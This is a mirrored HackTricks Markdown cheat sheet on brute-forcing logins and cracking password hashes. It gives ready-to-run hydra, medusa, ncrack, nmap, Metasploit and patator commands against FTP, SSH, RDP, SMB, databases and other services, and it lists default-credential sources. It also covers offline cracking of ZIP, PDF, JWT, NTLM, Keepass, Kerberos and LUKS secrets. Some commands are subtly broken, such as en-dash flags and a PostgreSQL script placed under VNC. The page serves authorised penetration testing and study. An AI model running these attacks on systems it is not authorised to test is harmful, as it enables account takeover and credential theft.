mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
504 lines
15 KiB
Markdown
504 lines
15 KiB
Markdown
# Brute Force - CheatSheet
|
||
|
||
## Default Credentials
|
||
|
||
**Search in google** for default credentials of the technology that is being used, or **try this links**:
|
||
|
||
* \*\*\*\*[**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)\*\*\*\*
|
||
* \*\*\*\*[**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)\*\*\*\*
|
||
* \*\*\*\*[**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)\*\*\*\*
|
||
* \*\*\*\*[**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)\*\*\*\*
|
||
* \*\*\*\*[**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)\*\*\*\*
|
||
* \*\*\*\*[**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)\*\*\*\*
|
||
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)\*\*\*\*
|
||
* \*\*\*\*[**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)\*\*\*\*
|
||
* \*\*\*\*[**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com/)\*\*\*\*
|
||
|
||
## **Create your own Dictionaries**
|
||
|
||
Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
|
||
|
||
### Crunch
|
||
|
||
```text
|
||
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
|
||
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
|
||
|
||
@ Lower case alpha characters
|
||
, Upper case alpha characters
|
||
% Numeric characters
|
||
^ Special characters including spac
|
||
crunch 6 8 -t ,@@^^%%
|
||
```
|
||
|
||
### Cewl
|
||
|
||
```bash
|
||
cewl example.com -m 5 -w words.txt
|
||
```
|
||
|
||
### [pydictor](https://github.com/LandGrey/pydictor)
|
||
|
||
### Wordlists
|
||
|
||
* \*\*\*\*[**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)\*\*\*\*
|
||
* \*\*\*\*[**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)\*\*\*\*
|
||
* \*\*\*\*[**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)\*\*\*\*
|
||
* \*\*\*\*[**https://github.com/google/fuzzing/tree/master/dictionaries**](%20https://github.com/google/fuzzing/tree/master/dictionaries)\*\*\*\*
|
||
* \*\*\*\*[**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)\*\*\*\*
|
||
|
||
## Services
|
||
|
||
Ordered alphabetically by service name.
|
||
|
||
### AFP
|
||
|
||
```bash
|
||
nmap -p 548 --script afp-brute <IP>
|
||
msf> use auxiliary/scanner/afp/afp_login
|
||
msf> set BLANK_PASSWORDS true
|
||
msf> set USER_AS_PASS true
|
||
msf> set PASS_FILE <PATH_PASSWDS>
|
||
msf> set USER_FILE <PATH_USERS>
|
||
msf> run
|
||
```
|
||
|
||
### AJP
|
||
|
||
```bash
|
||
nmap --script ajp-brute -p 8009 <IP>
|
||
```
|
||
|
||
### Cassandra
|
||
|
||
```bash
|
||
nmap --script cassandra-brute -p 9160 <IP>
|
||
```
|
||
|
||
### CouchDB
|
||
|
||
```bash
|
||
msf> use auxiliary/scanner/couchdb/couchdb_login
|
||
```
|
||
|
||
### FTP
|
||
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> ftp
|
||
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
|
||
```
|
||
|
||
### HTTP Generic Brute
|
||
|
||
#### [**WFuzz**](pentesting-web/web-tool-wfuzz.md)\*\*\*\*
|
||
|
||
### HTTP Basic Auth
|
||
|
||
```bash
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
|
||
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
|
||
```
|
||
|
||
### HTTP - Post Form
|
||
|
||
```bash
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
|
||
```
|
||
|
||
For http**s** you have to change from "http-post-form" to "**https-post-form"**
|
||
|
||
### **HTTP - CMS --** \(W\)ordpress, \(J\)oomla or \(D\)rupal or \(M\)oodle
|
||
|
||
```bash
|
||
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
|
||
```
|
||
|
||
### IMAP
|
||
|
||
```bash
|
||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
|
||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
|
||
nmap -sV --script imap-brute -p <PORT> <IP>
|
||
```
|
||
|
||
### IRC
|
||
|
||
```bash
|
||
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
|
||
```
|
||
|
||
### ISCSI
|
||
|
||
```bash
|
||
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
|
||
```
|
||
|
||
### LDAP
|
||
|
||
```bash
|
||
nmap --script ldap-brute -p 389 <IP>
|
||
```
|
||
|
||
### Mongo
|
||
|
||
```bash
|
||
nmap -sV --script mongodb-brute -n -p 27017 <IP>
|
||
use auxiliary/scanner/mongodb/mongodb_login
|
||
```
|
||
|
||
### MySQL
|
||
|
||
```bash
|
||
hydra -L usernames.txt -P pass.txt <IP> mysql
|
||
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
|
||
```
|
||
|
||
### OracleSQL
|
||
|
||
```bash
|
||
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
|
||
|
||
./odat.py passwordguesser -s $SERVER -d $SID
|
||
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
|
||
|
||
#msf1
|
||
msf> use admin/oracle/oracle_login
|
||
msf> set RHOSTS <IP>
|
||
msf> set RPORT 1521
|
||
msf> set SID <SID>
|
||
|
||
#msf2, this option uses nmap and it fails sometimes for some reason
|
||
msf> use scanner/oracle/oracle_login
|
||
msf> set RHOSTS <IP>
|
||
msf> set RPORTS 1521
|
||
msf> set SID <SID>
|
||
|
||
#nmap fails sometimes for some reson executing this script
|
||
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
|
||
```
|
||
|
||
In order to use **oracle\_login** with **patator** you need to **install**:
|
||
|
||
```bash
|
||
pip3 install cx_Oracle --upgrade
|
||
```
|
||
|
||
[Offline OracleSQL hash bruteforce](pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) \(**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**\):
|
||
|
||
```bash
|
||
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
|
||
```
|
||
|
||
### POP
|
||
|
||
```bash
|
||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
|
||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
|
||
```
|
||
|
||
### PostgreSQL
|
||
|
||
```bash
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
|
||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
|
||
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
|
||
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
|
||
use auxiliary/scanner/postgres/postgres_login
|
||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||
```
|
||
|
||
### PPTP
|
||
|
||
You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
|
||
|
||
```bash
|
||
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
|
||
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
|
||
```
|
||
|
||
### RDP
|
||
|
||
```bash
|
||
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
|
||
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
|
||
```
|
||
|
||
### Redis
|
||
|
||
```bash
|
||
msf> use auxiliary/scanner/redis/redis_login
|
||
nmap --script redis-brute -p 6379 <IP>
|
||
hydra –P /path/pass.txt <IP> redis
|
||
```
|
||
|
||
### Rexec
|
||
|
||
```bash
|
||
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
|
||
```
|
||
|
||
### Rlogin
|
||
|
||
```bash
|
||
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
|
||
```
|
||
|
||
### Rsh
|
||
|
||
```bash
|
||
hydra -L <Username_list> rsh://<Victim_IP> -v -V
|
||
```
|
||
|
||
[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
|
||
|
||
### Rsync
|
||
|
||
```bash
|
||
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
|
||
```
|
||
|
||
### RTSP
|
||
|
||
```bash
|
||
hydra -l root -P passwords.txt <IP> rtsp
|
||
```
|
||
|
||
### SNMP
|
||
|
||
```bash
|
||
msf> use auxiliary/scanner/snmp/snmp_login
|
||
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
|
||
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
|
||
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
|
||
```
|
||
|
||
### SMB
|
||
|
||
```bash
|
||
nmap --script smb-brute -p 445 <IP>
|
||
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
|
||
```
|
||
|
||
### SMTP
|
||
|
||
```bash
|
||
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
|
||
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
|
||
```
|
||
|
||
### SQL Server
|
||
|
||
```bash
|
||
#Use the NetBIOS name of the machine as domain
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
|
||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
|
||
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
|
||
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
|
||
```
|
||
|
||
### SSH
|
||
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
||
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
||
```
|
||
|
||
### Telnet
|
||
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> telnet
|
||
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
|
||
```
|
||
|
||
### VNC
|
||
|
||
```bash
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
|
||
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
|
||
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
|
||
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login
|
||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||
```
|
||
|
||
## Local
|
||
|
||
### Online cracking databases
|
||
|
||
* [http://hashtoolkit.com/reverse-hash?](http://hashtoolkit.com/reverse-hash?) \(MD5 & SHA1\)
|
||
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/) \(Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...\)
|
||
* [https://crackstation.net/](https://crackstation.net/) \(Hashes\)
|
||
* [https://md5decrypt.net/](https://md5decrypt.net/) \(MD5\)
|
||
* [https://gpuhash.me/](https://gpuhash.me/) \(Hashes and file hashes\)
|
||
* [https://hashes.org/search.php](https://hashes.org/search.php) \(Hashes\)
|
||
* [https://www.cmd5.org/](https://www.cmd5.org/) \(Hashes\)
|
||
* [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) \(MD5, NTLM, SHA1, MySQL5, SHA256, SHA512\)
|
||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) \(MD5\)
|
||
|
||
Check this out before trying to bruteforce a Hash.
|
||
|
||
### ZIP
|
||
|
||
```bash
|
||
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
|
||
```
|
||
|
||
```bash
|
||
zip2john file.zip > zip.john
|
||
john zip.john
|
||
```
|
||
|
||
### 7z
|
||
|
||
```bash
|
||
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
|
||
```
|
||
|
||
```bash
|
||
#Download and install requirements for 7z2john
|
||
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
|
||
apt-get install libcompress-raw-lzma-perl
|
||
./7z2john.pl file.7z > 7zhash.john
|
||
```
|
||
|
||
### PDF
|
||
|
||
```bash
|
||
apt-get install pdfcrack
|
||
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
|
||
#pdf2john didnt worked well, john didnt know which hash type was
|
||
# To permanently decrypt the pdf
|
||
sudo apt-get install qpdf
|
||
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
|
||
```
|
||
|
||
### JWT
|
||
|
||
```bash
|
||
git clone https://github.com/Sjord/jwtcrack.git
|
||
cd jwtcrack
|
||
|
||
#Bruteforce using crackjwt.py
|
||
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
||
|
||
#Bruteforce using john
|
||
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
|
||
john jwt.john #It does not work with Kali-John
|
||
```
|
||
|
||
### NTLM cracking
|
||
|
||
```bash
|
||
Format:USUARIO:ID:HASH_LM:HASH_NT:::
|
||
jhon --wordlist=/usr/share/wordlists/rockyou.txt --fomrat=NT file_NTLM.hashes
|
||
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
|
||
```
|
||
|
||
### Keepass
|
||
|
||
```bash
|
||
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
|
||
keepass2john file.kdbx > hash #The keepass is only using password
|
||
keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential
|
||
#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt hash
|
||
```
|
||
|
||
### Keberoasting
|
||
|
||
```bash
|
||
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
|
||
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
|
||
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
|
||
```
|
||
|
||
### Lucks image
|
||
|
||
#### Method 1
|
||
|
||
Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
|
||
|
||
```bash
|
||
bruteforce-luks -f ./list.txt ./backup.img
|
||
cryptsetup luksOpen backup.img mylucksopen
|
||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||
mount /dev/mapper/mylucksopen /mnt
|
||
```
|
||
|
||
#### Method 2
|
||
|
||
```bash
|
||
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
|
||
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
|
||
hashcat -m 14600 luckshash
|
||
cryptsetup luksOpen backup.img mylucksopen
|
||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||
mount /dev/mapper/mylucksopen /mnt
|
||
```
|
||
|
||
### Mysql
|
||
|
||
```bash
|
||
#John hash format
|
||
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
|
||
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
|
||
```
|
||
|
||
## Tools
|
||
|
||
**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
|
||
|
||
### Hash-identifier
|
||
|
||
```bash
|
||
hash-identifier
|
||
> <HASH>
|
||
```
|
||
|
||
### John mutation
|
||
|
||
Read _**/etc/john/john.conf**_ and configure it
|
||
|
||
```bash
|
||
john --wordlist=words.txt --rules --stdout > w_mutated.txt
|
||
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
|
||
```
|
||
|
||
### Hashcat
|
||
|
||
```bash
|
||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||
```
|
||
|
||
Cracking Linux Hashes - /etc/shadow file
|
||
|
||
```text
|
||
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
|
||
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
|
||
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
|
||
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
|
||
```
|
||
|
||
Cracking Windows Hashes
|
||
|
||
```text
|
||
3000 | LM | Operating-Systems
|
||
1000 | NTLM | Operating-Systems
|
||
```
|
||
|
||
Cracking Common Application Hashes
|
||
|
||
```text
|
||
900 | MD4 | Raw Hash
|
||
0 | MD5 | Raw Hash
|
||
5100 | Half MD5 | Raw Hash
|
||
100 | SHA1 | Raw Hash
|
||
10800 | SHA-384 | Raw Hash
|
||
1400 | SHA-256 | Raw Hash
|
||
1700 | SHA-512 | Raw Hash
|
||
```
|
||
|
||
|
||
|